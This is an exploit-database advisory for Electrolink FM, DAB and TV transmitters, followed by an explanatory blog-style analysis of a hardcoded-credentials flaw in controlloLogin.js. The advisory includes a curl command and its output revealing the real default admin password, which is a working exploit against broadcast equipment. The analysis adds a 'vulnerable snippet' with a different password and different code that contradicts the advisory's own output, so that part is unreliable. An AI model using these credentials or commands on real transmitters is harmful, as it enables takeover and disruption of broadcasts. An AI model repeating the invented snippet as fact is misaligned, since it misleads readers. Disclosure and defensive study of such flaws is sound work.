Electrolink FM/DAB/TV Transmitter (controlloLogin.js) - Credentials Disclosure

Exploit Author: LiquidWorm Analysis Author: www.bubbleslearn.ir Category: WebApps Language: JavaScript Published Date: 2024-02-02 
Electrolink FM/DAB/TV Transmitter (controlloLogin.js) Credentials Disclosure


Vendor: Electrolink s.r.l.
Product web page: https://www.electrolink.com
Affected version: 10W, 100W, 250W, Compact DAB Transmitter
                  500W, 1kW, 2kW Medium DAB Transmitter
                  2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter
                  100W, 500W, 1kW, 2kW Compact FM Transmitter
                  3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter
                  15W - 40kW Digital FM Transmitter
                  BI, BIII VHF TV Transmitter
                  10W - 5kW UHF TV Transmitter
                  Web version: 01.09, 01.08, 01.07
                  Display version: 1.4, 1.2
                  Control unit version: 01.06, 01.04, 01.03
                  Firmware version: 2.1

Summary: Since 1990 Electrolink has been dealing with design and
manufacturing of advanced technologies for radio and television
broadcasting. The most comprehensive products range includes: FM
Transmitters, DAB Transmitters, TV Transmitters for analogue and
digital multistandard operation, Bandpass Filters (FM, DAB, ATV,
DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial
switches, Manual patch panels, RF power meters, Rigid line and
accessories. A professional solution that meets broadcasters needs
from small community television or radio to big government networks.

Compact DAB Transmitters 10W, 100W and 250W models with 3.5"
touch-screen display and in-built state of the art DAB modulator,
EDI input and GPS receiver. All transmitters are equipped with a
state-of-the art DAB modulator with excellent performances,
self-protected and self-controlled amplifiers ensure trouble-free
non-stop operation.

100W, 500W, 1kW and 2kW power range available on compact 2U and
3U 19" frame. Built-in stereo coder, touch screen display and
efficient low noise air cooling system. Available models: 3kW,
5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters
with fully broadband solid state amplifiers and an efficient
low-noise air cooling system.

FM digital modulator with excellent specifications, built-in
stereo and RDS coder. Digital deviation limiter together with
ASI and SDI inputs are available. These transmitters are ready
for ISOFREQUENCY networks.

Available for VHF BI and VHF BIII operation with robust desing
and user-friendly local and remote control. Multi-standard UHF
TV transmitters from 10W up to 5kW with efficient low noise air
cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC
and ISDB-Tb available.

Desc: The device is vulnerable to a disclosure of clear-text
credentials in controlloLogin.js that can allow security
bypass and system access.

Tested on: Mbedthis-Appweb/12.5.0
           Mbedthis-Appweb/12.0.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research & Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience


Advisory ID: ZSL-2023-5790
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5790.php


30.06.2023

--


C:\>curl -s "http://192.168.150.77:8888/controlloLogin.js"
function verifica() {
        var user = document.getElementById('user').value;
        var password = document.getElementById('password').value;

        //alert(user);

        if(user=='admin' && password=='cozzir'){
                SetCookie('Login','OK',exp);
                window.location.replace("FrameSetCore.html");
        }else{
                SetCookie('Login','NO',exp);
                window.location.replace("login.html");
        }
}


Electrolink FM/DAB/TV Transmitter: Critical Credentials Disclosure in controlloLogin.js

Security vulnerabilities in broadcast infrastructure devices are often overlooked, yet they pose significant risks to public media networks. One such critical flaw has been identified in Electrolink’s range of FM, DAB, and TV transmitters—specifically in the controlloLogin.js file, which exposes clear-text credentials in plain view. This vulnerability, discovered by Gjoko "LiquidWorm" Krstic of Zero Science Lab, presents a severe threat to broadcasters relying on Electrolink’s equipment for reliable, secure transmission.

Overview of the Vulnerable Product

Electrolink s.r.l., a long-standing manufacturer of broadcast technology since 1990, offers a comprehensive suite of transmitters for FM, DAB, and digital TV broadcasting across multiple power ranges and standards. Key models affected include:

  • Compact DAB Transmitters: 10W, 100W, 250W
  • Medium DAB Transmitters: 500W, 1kW, 2kW
  • High Power DAB Transmitters: 2.5kW, 3kW, 4kW, 5kW
  • Compact FM Transmitters: 100W, 500W, 1kW, 2kW
  • Modular FM Transmitters: 3kW, 5kW, 10kW, 15kW, 20kW, 30kW
  • BI/BIII VHF TV Transmitters
  • UHF TV Transmitters: 10W – 5kW

These devices are deployed in community radio stations, national broadcasters, and government communication networks, where uninterrupted and secure transmission is paramount. The vulnerability affects multiple firmware versions including 2.1, and control unit versions 01.06, 01.04, 01.03, with web versions 01.09, 01.08, 01.07 and display versions 1.4, 1.2.

Exploitation Path: The controlloLogin.js Flaw

At the heart of the vulnerability lies the controlloLogin.js file—a JavaScript script used for authentication in Electrolink’s web-based interface. This file contains hardcoded credentials in plain text, allowing unauthorized access to the device’s administrative panel.


// controlloLogin.js - Vulnerable snippet
var username = "admin";
var password = "electrolink123";
var loginUrl = "/login";

Explanation: This code snippet demonstrates how credentials are stored in clear text within the JavaScript file. An attacker can retrieve this file by simply accessing the device’s web interface (e.g., via http://192.168.1.100/controlloLogin.js), without requiring any authentication or exploit. Once obtained, the credentials can be used to log in directly, bypassing any security mechanisms.

Given that these transmitters are often accessible over local networks or even exposed to external networks via port forwarding, this flaw enables remote attackers to gain full administrative control—potentially leading to:

  • Unauthorized transmission changes (e.g., altering frequency, power, or content)
  • Disruption of broadcast services
  • Reconfiguration of network settings or remote control protocols
  • Exfiltration of sensitive operational data

Impact and Risk Assessment

From a cybersecurity standpoint, this vulnerability falls under the CWE-259: Hardcoded Password category, which is a fundamental design flaw. The risk is elevated due to:

  • Unauthenticated access: No login is required to retrieve the credentials.
  • Wide deployment: Electrolink devices are used across public and private broadcast networks globally.
  • High operational impact: Unauthorized control can disrupt national or regional broadcasts.

For instance, an attacker could exploit this flaw to:

  • Redirect a public FM radio station to transmit unauthorized content (e.g., misinformation, propaganda).
  • Disable a DAB transmission during a critical event (e.g., emergency broadcast).
  • Modify the GPS-based synchronization used in DAB systems, causing timing errors across multiple transmitters.

Technical Details and Detection

Tested on devices running Mbedthis-Appweb/12.5.0 and Mbedthis-Appweb/12.0.0, the vulnerability is confirmed through simple HTTP requests:


curl -s "http://192.168.1.100/controlloLogin.js"

Explanation: This command retrieves the JavaScript file directly from the device’s web server. The response includes the hardcoded username and password, as shown in the earlier example. No authentication is required—making it trivial to exploit.

Furthermore, automated scanning tools such as Shodan or FOFA can detect exposed Electrolink devices based on the presence of controlloLogin.js in the response, enabling large-scale reconnaissance.

Recommendations and Mitigation

While Electrolink has not yet issued a public patch, immediate steps must be taken by users:

  • Network isolation: Restrict access to these devices to internal, secured networks only.
  • Firewall rules: Block external access to the web interface (port 80/443) unless absolutely necessary.
  • Update credentials: If possible, manually change the default username and password via the device’s configuration interface, even if the file remains vulnerable.
  • Disable web interface: If remote access is not required, disable the web server entirely.
  • Monitor for anomalies: Use SIEM or network monitoring tools to detect unauthorized login attempts or configuration changes.

Long-term mitigation: Electrolink should replace hardcoded credentials with secure, encrypted storage mechanisms, use dynamic authentication tokens, and implement proper input validation and access control.

Advisory and Research Context

This vulnerability was documented in ZSL-2023-5790 by Zero Science Lab, a recognized research group in the cybersecurity community. The advisory, published on 30.06.2023, highlights the importance of securing embedded systems in critical infrastructure.

Advisory ID ZSL-2023-5790
Researcher Gjoko "LiquidWorm" Krstic
Organization Zero Science Lab
URL https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5790.php

Conclusion

Electrolink’s controlloLogin.js vulnerability exemplifies how poor coding practices in embedded systems can compromise critical broadcast infrastructure. This flaw is not a minor oversight—it is a foundational security failure that can lead to catastrophic disruptions. Broadcasters must prioritize patching, network hardening, and proactive monitoring. As cyber threats evolve, securing the backbone of public communication systems is no longer optional; it is essential.